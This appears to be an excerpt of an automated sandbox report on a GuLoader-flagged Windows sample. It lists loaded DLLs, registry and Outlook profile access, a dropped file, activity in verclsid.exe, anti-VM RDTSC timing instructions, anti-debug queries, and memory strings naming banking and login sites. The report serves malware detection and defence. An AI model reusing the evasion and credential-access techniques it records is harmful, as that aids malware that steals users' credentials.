Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\verclsid.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: Anfrage_244384.exe

Static file information: File size 1240824 > 1048576

Source: Anfrage_244384.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dptLotHBnXg.exe, 00000006.00000000.3013372549.00000000009CE000.00000002.00000001.01000000.00000009.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174453120.00000000009CE000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: wntdll.pdbUGP source: Anfrage_244384.exe, 00000004.00000003.2992504596.00000000342E0000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2995103933.0000000034492000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3106086622.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3098948159.0000000004205000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Anfrage_244384.exe, Anfrage_244384.exe, 00000004.00000003.2992504596.00000000342E0000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2995103933.0000000034492000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000007.00000003.3106086622.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3098948159.0000000004205000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: verclsid.pdbGCTL source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092495841.000000000441D000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000002.3361641901.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: verclsid.pdb source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092495841.000000000441D000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000002.3361641901.000000000140E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2597198603.0000000004A03000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_10002D20 push eax; ret
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346427FA pushad ; ret
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3464225F pushad ; ret
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3464283D push eax; iretd
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346709AD push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045909AD push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C0B37 push ds; iretd
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003CEC80 push edx; retn 134Bh
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C4FF9 push 00000065h; retf
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C7306 pushad ; ret
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C74CD push esp; retf
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003CBFC7 push eax; iretd
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B5491 push ds; retf
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B659E push 00000051h; iretd
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B5564 push eax; retf
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC6E5 push ecx; iretd
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC60A push ecx; iretd
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC67D push ecx; iretd
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B47B3 push edi; ret
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BD02C push FFFFFFF7h; ret
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BB2A4 pushfd ; ret
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B6258 push esp; ret
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B737C pushfd ; iretd
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BBD56 pushfd ; retf
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B5E2D push ecx; retf
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B5E46 push ebp; ret
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC813 pushfd ; ret
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC869 push edi; iretd
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B596F push 0000002Ch; ret
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B0BAE push edx; iretd
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B0BBE push FFFFFFFDh; iretd

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File created: C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Anfrage_244384.exe	API/Special instruction interceptor: Address: 4D102F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	API/Special instruction interceptor: Address: 38D02F6
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Anfrage_244384.exe	RDTSC instruction interceptor: First address: 4CD3731 second address: 4CD3731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1534B1992Bh 0x00000004 test bh, ah 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F1534B19905h 0x0000000a test dl, bl 0x0000000c inc ebp 0x0000000d test edx, 1E38E0C7h 0x00000013 inc ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Anfrage_244384.exe	RDTSC instruction interceptor: First address: 3893731 second address: 3893731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15350784ABh 0x00000004 test bh, ah 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F1535078485h 0x0000000a test dl, bl 0x0000000c inc ebp 0x0000000d test edx, 1E38E0C7h 0x00000013 inc ebx 0x00000014 rdtsc

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 4_2_347416A6 rdtsc

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Anfrage_244384.exe	API coverage: 0.2 %
Source: C:\Windows\SysWOW64\verclsid.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\verclsid.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_0040270B FindFirstFileA,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_004060C7 FindFirstFileA,FindClose,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003CC460 FindFirstFileW,FindNextFileW,FindClose,

Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 02-E8420l.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 02-E8420l.7.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: merica.comVMware20,11696487552\|UE
Source: 02-E8420l.7.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 02-E8420l.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Anfrage_244384.exe, 00000004.00000003.2993262650.00000000043CD000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043CD000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2992975055.00000000043CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 02-E8420l.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 02-E8420l.7.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696487552u
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8J=
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,116
Source: 02-E8420l.7.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000805000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362395237.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 02-E8420l.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 02-E8420l.7.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 02-E8420l.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 02-E8420l.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,1169648E
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ebrokers.co.inVMware20,11696487552d
Source: 02-E8420l.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 02-E8420l.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 02-E8420l.7.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 02-E8420l.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CDYNVMware20,116,)
Source: 02-E8420l.7.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 02-E8420l.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 02-E8420l.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 02-E8420l.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\Anfrage_244384.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Anfrage_244384.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\verclsid.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\verclsid.exe

Process queried: DebugPort

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 4_2_347416A6 rdtsc

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 4_2_346B35C0 NtCreateMutant,LdrInitializeThunk,

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474547F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F453 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469340D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F7410 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347414F6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347414F6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347194E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347454DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346674B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346674B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A34B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34679486 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34679486 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B480 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B562 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AB570 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AB570 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B550 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B550 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B550 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AD530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AD530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472B52F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A7505 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A7505 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347435D7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347435D7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347435D7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A55C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346995DA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347455C9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED5D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3470D5B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3470D5B0 mov eax, dword ptr fs:[00000030h]
